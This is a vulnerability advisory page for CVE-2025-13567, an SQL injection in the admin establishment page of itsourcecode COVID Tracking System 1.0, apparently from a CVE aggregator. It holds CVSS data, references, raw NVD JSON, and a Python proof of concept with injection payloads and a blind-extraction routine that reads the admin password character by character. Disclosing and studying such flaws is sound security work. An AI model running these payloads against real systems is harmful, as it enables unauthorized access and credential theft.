CVE-2025-13567

Description

A vulnerability was detected in itsourcecode COVID Tracking System 1.0. This affects an unknown function of the file /admin/?page=establishment. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode COVID Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-13567 SQL Injection PoC
# Target: itsourcecode COVID Tracking System 1.0
# Endpoint: /admin/?page=establishment

target_url = "http://target.com/admin/?page=establishment"

# Basic SQL Injection test payload
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT NULL--",
    "1' AND 1=1--",
    "1' AND 1=2--",
]

def test_sql_injection(url, param='id'):
    """Test for SQL injection vulnerability"""
    for payload in payloads:
        try:
            params = {param: payload}
            response = requests.get(url, params=params, timeout=10)
            # Check for SQL error indicators
            if any(indicator in response.text.lower() for indicator in 
                   ['sql syntax', 'mysql', 'warning', 'error']):
                print(f"[+] Potential SQL Injection found with payload: {payload}")
                return True
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
    return False

# Blind SQL Injection extraction example
def extract_data_blind(url, param='id'):
    """Extract data using blind SQL injection"""
    extracted = ""
    charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for pos in range(1, 33):  # Extract 32 characters
        for char in charset:
            payload = f"1' AND SUBSTRING((SELECT password FROM admin LIMIT 1),{pos},1)='{char}'--"
            params = {param: payload}
            try:
                response = requests.get(url, params=params, timeout=10)
                # Adjust condition based on actual response behavior
                if 'expected_content' in response.text:
                    extracted += char
                    print(f"[*] Extracted: {extracted}")
                    break
            except:
                pass
    return extracted

if __name__ == "__main__":
    print("[*] Testing CVE-2025-13567 SQL Injection")
    test_sql_injection(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13567
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13567
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13567/
[4] VulDB https://vuldb.com/cve/CVE-2025-13567
[5] https://github.com/Abxery/cveee/issues/9
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.333331
[8] https://vuldb.com/?id.333331
[9] https://vuldb.com/?submit.698116

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13567", "sourceIdentifier": "[email protected]", "published": "2025-11-23T20:15:40.210", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in itsourcecode COVID Tracking System 1.0. This affects an unknown function of the file /admin/?page=establishment. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F9CA2A72-A364-4090-A959-6AA82D55A239"}]}]}], "references": [{"url": "https://github.com/Abxery/cveee/issues/9", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.333331", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333331", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.698116", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}